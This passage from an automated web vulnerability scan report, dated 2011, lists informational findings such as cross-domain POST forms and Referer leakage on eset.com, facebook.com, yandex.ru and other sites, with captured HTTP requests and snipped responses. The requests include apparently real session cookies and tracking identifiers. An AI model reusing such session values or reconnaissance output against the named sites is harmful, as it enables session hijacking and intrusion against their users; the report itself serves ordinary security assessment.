Date: Mon, 25 Apr 2011 12:58:58 GMT
X-Varnish: 1310978090
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>M
...[SNIP]...
ifying name, server, and channel on
the next lines. */
s.pageName="";
s.server="";
s.channel="Business";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="direct";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript>

<script type="text/javascript" src="/us/scripts/elqNow/elqCfg.js"></script>
<script type="text/javascript" src="/us/scripts/elqNow/elqImg.js"></script>
</body>
</html>

20.6. http://www.eset.com/us/home/smart-security previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.eset.com
Path:	/us/home/smart-security

Request 1

GET /us/home/smart-security HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=3; PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=PC#1303736347554-914602.17#1304952767|check#true#1303743227|session#1303743154006-383984#1303745027; __utma=1.1646584456.1303732844.1303735979.1303743158.3; __utmc=1; __utmb=1.2.10.1303743158; s_pers=%20s_vnum%3D1335268844052%2526vn%253D3%7C1335268844052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%252C%255B%2527Other%252520Referrers-shopping.netsuite.com%2527%252C%25271303743170439%2527%255D%255D%7C1461595970439%3B%20s_visit%3D1%7C1303745017240%3B%20gpv_pageName%3Dus/new_homepage%7C1303745017242%3B%20s_nr%3D1303743217244-Repeat%7C1335279217244%3B%20s_invisit%3Dtrue%7C1303745017246%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedshopping.netsuite.comshopping.netsuite.com%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/new_homepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/home/smart-security%252526ot%25253DA%3B

Response 1

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 25484
Date: Mon, 25 Apr 2011 15:17:24 GMT
X-Varnish: 555654660
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
dentifying name, server, and channel on
the next lines. */
s.pageName="";
s.server="";
s.channel="Home";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.eset.com/us/";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript>

<script type="text/javascript" src="/us/scripts/elqNow/elqCfg.js"></script>
<script type="text/javascript" src="/us/scripts/elqNow/elqImg.js"></script>
</body>
</html>

Request 2

GET /us/home/smart-security HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=3; PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=PC#1303736347554-914602.17#1304952767|check#true#1303743227|session#1303743154006-383984#1303745027; __utma=1.1646584456.1303732844.1303735979.1303743158.3; __utmc=1; __utmb=1.2.10.1303743158; s_pers=%20s_vnum%3D1335268844052%2526vn%253D3%7C1335268844052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%252C%255B%2527Other%252520Referrers-shopping.netsuite.com%2527%252C%25271303743170439%2527%255D%255D%7C1461595970439%3B%20s_visit%3D1%7C1303745017240%3B%20gpv_pageName%3Dus/new_homepage%7C1303745017242%3B%20s_nr%3D1303743217244-Repeat%7C1335279217244%3B%20s_invisit%3Dtrue%7C1303745017246%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedshopping.netsuite.comshopping.netsuite.com%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/new_homepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/home/smart-security%252526ot%25253DA%3B

Response 2

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 25467
Date: Mon, 25 Apr 2011 15:17:36 GMT
X-Varnish: 555655337
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
dentifying name, server, and channel on
the next lines. */
s.pageName="";
s.server="";
s.channel="Home";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="direct";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript>

<script type="text/javascript" src="/us/scripts/elqNow/elqCfg.js"></script>
<script type="text/javascript" src="/us/scripts/elqNow/elqImg.js"></script>
</body>
</html>

20.7. http://www.eset.com/us/store previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.eset.com
Path:	/us/store

Request 1

GET /us/store HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response 1

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38877
Date: Mon, 25 Apr 2011 12:58:55 GMT
X-Varnish: 1310977884
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
entifying name, server, and channel on
the next lines. */
s.pageName="";
s.server="";
s.channel="Store";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.eset.com/us/business/products";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript>

<script type="text/javascript" src="/us/scripts/elqNow/elqCfg.js"></script>
<script type="text/javascript" src="/us/scripts/elqNow/elqImg.js"></script>
</body>
</html>

Request 2

GET /us/store HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response 2

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38843
Date: Mon, 25 Apr 2011 12:59:06 GMT
X-Varnish: 1310978471
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
entifying name, server, and channel on
the next lines. */
s.pageName="";
s.server="";
s.channel="Store";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="direct";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript>

<script type="text/javascript" src="/us/scripts/elqNow/elqCfg.js"></script>
<script type="text/javascript" src="/us/scripts/elqNow/elqImg.js"></script>
</body>
</html>

20.8. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/like.php

Request 1

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d0bfa794%26origin%3Dhttp%253A%252F%252Fwww.eset.com%252Ff259c7ddf8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=segoe%20ui&href=http%3A%2F%2Fwww.facebook.com%2Fesetusa&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.150.41
X-Cnection: close
Date: Mon, 25 Apr 2011 12:52:48 GMT
Content-Length: 8179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4db56ea051fe32f95192852" class="connect_widget button_count" style="font-family: "segoe ui", sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">18K</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">18K</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"35053bf7",user:0,locale:"en_US",method:"GET",dev:0,start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:370179,vip:"66.220.149.18",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,pc:{"m":"1.0.4","l":"1.0.4","axi":true,"j":true,"bsz":16},fb_dtsg:"jz9sm",lhsh:"c840b",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"AAmvK":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v
...[SNIP]...

Request 2

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d0bfa794%26origin%3Dhttp%253A%252F%252Fwww.eset.com%252Ff259c7ddf8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=segoe%20ui&href=http%3A%2F%2Fwww.facebook.com%2Fesetusa&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.189.65
X-Cnection: close
Date: Mon, 25 Apr 2011 12:52:58 GMT
Content-Length: 8088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4db56eaa5fd462d39665703" class="connect_widget button_count" style="font-family: "segoe ui", sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">18K</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">18K</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"e9c33a83",user:0,locale:"en_US",method:"GET",dev:0,start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:370179,vip:"66.220.149.18",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,pc:{"m":"1.0.4","l":"1.0.4","axi":true,"j":true,"bsz":16},fb_dtsg:"jz9sm",lhsh:"c840b",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"AAmvK":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v
...[SNIP]...

21. Cross-domain POST previous next
There are 11 instances of this issue:

http://direct.yandex.ru/
http://nguard.com/contact.aspx
http://nguard.com/security/contact.aspx
http://odnoklassniki.ru/
http://www.eset.com/us/home/smart-security
http://www.eset.com/us/store
http://www.eset.com/us/store
http://www.eset.com/us/store
http://www.eset.com/us/store
http://www.eset.com/us/store
http://www.eset.com/us/store

21.1. http://direct.yandex.ru/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://direct.yandex.ru
Path:	/

Issue detail

The page contains a form which POSTs data to the domain passport.yandex.ru. The form contains the following fields:

login
passwd
twoweeks

Request

Response

21.2. http://nguard.com/contact.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nguard.com
Path:	/contact.aspx

Issue detail

The page contains a form which POSTs data to the domain www.salesforce.com. The form contains the following fields:

oid
retURL
lead_source
rating
first_name
last_name
company
email
phone
Submit

Request

GET /contact.aspx HTTP/1.1
Host: nguard.com
Proxy-Connection: keep-alive
Referer: http://nguard.com/about.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=74935565.1303735966.2.2.utmgclid=CM2C9p3Pt6gCFUOo4AoduRviBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=74935565.1810353086.1303732835.1303732835.1303735966.2; __utmc=74935565; __utmb=74935565.2.10.1303735966

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:09:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- InstanceBegin codeOutsi
...[SNIP]...
<div>


                <form action="http://www.salesforce.com/servlet/servlet.WebToLead?encoding=UTF-8" method="post" name="conatct" id="conatct" onsubmit="return validateForm();">


                                                <p class="copySmallBold" >
...[SNIP]...

21.3. http://nguard.com/security/contact.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nguard.com
Path:	/security/contact.aspx

Issue detail

The page contains a form which POSTs data to the domain www.salesforce.com. The form contains the following fields:

first_name
last_name
email
phone
Submit
oid
retURL
lead_source
rating

Request

GET /security/contact.aspx HTTP/1.1
Host: nguard.com
Proxy-Connection: keep-alive
Referer: http://nguard.com/vulnerability-assessment/?gclid=CM2C9p3Pt6gCFUOo4AoduRviBQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=74935565.1303732835.1.1.utmgclid=CM2C9p3Pt6gCFUOo4AoduRviBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=74935565.1810353086.1303732835.1303732835.1303732835.1; __utmc=74935565

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:52:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Contact</ti
...[SNIP]...
</ul>
<form action="http://www.salesforce.com/servlet/servlet.WebToLead?encoding=UTF-8" method="post" name="conatct" id="conatct" onsubmit="return validateSimpleForm();">
<table width="100%" border="0" cellspacing="1" cellpadding="1" id="tblContact">
...[SNIP]...

21.4. http://odnoklassniki.ru/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://odnoklassniki.ru
Path:	/

Issue detail

The page contains a form which POSTs data to the domain www.odnoklassniki.ru. The form contains the following fields:

st.redirect
st.posted
st.email
st.password
st.remember
st.fJS
st.screenSize
st.browserSize
st.flashVer
button_go

Request

Response

21.5. http://www.eset.com/us/home/smart-security previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.eset.com
Path:	/us/home/smart-security

Issue detail

The page contains a form which POSTs data to the domain shopping.netsuite.com. The form contains the following fields:

buyid
buyid
buyid
buyid
buyid
buyid
buyid
buyid
buyid
buyid
Submit
promocode
c
qtyadd

Request

Response

21.6. http://www.eset.com/us/store previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.eset.com
Path:	/us/store

Issue detail

The page contains a form which POSTs data to the domain shopping.netsuite.com. The form contains the following fields:

buyid
buyid
buyid
buyid
buyid
buyid
buyid
buyid
buyid
buyid
Submit
c
qtyadd
promocode

Request

Response

21.7. http://www.eset.com/us/store previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.eset.com
Path:	/us/store

Issue detail

The page contains a form which POSTs data to the domain shopping.netsuite.com. The form contains the following fields:

buyid
buyid
buyid
buyid
buyid
buyid
buyid
buyid
Submit
c
qtyadd
promocode

Request

Response

21.8. http://www.eset.com/us/store previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.eset.com
Path:	/us/store

Issue detail

The page contains a form which POSTs data to the domain shopping.netsuite.com. The form contains the following fields:

buyid
buyid
buyid
buyid
buyid
buyid
Submit
c
qtyadd
promocode

Request

Response

21.9. http://www.eset.com/us/store previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.eset.com
Path:	/us/store

Issue detail

The page contains a form which POSTs data to the domain shopping.netsuite.com. The form contains the following fields:

buyid
buyid
buyid
buyid
Submit
c
qtyadd
promocode

Request

Response

21.10. http://www.eset.com/us/store previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.eset.com
Path:	/us/store

Issue detail

The page contains a form which POSTs data to the domain shopping.netsuite.com. The form contains the following fields:

buyid
buyid
buyid
buyid
buyid
buyid
Submit
c
qtyadd
promocode

Request

Response

21.11. http://www.eset.com/us/store previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.eset.com
Path:	/us/store

Issue detail

The page contains a form which POSTs data to the domain shopping.netsuite.com. The form contains the following fields:

buyid
buyid
buyid
buyid
buyid
buyid
buyid
buyid
buyid
buyid
Submit
c
qtyadd
promocode

Request

Response

22. Cross-domain Referer leakage previous next
There are 63 instances of this issue:

http://ad.amgdgt.com/ads/
http://ad.amgdgt.com/ads/
http://an.yandex.ru/code/57617
http://an.yandex.ru/code/57617
http://an.yandex.ru/code/57617
http://an.yandex.ru/code/66894
https://checkout.netsuite.com/s.nl
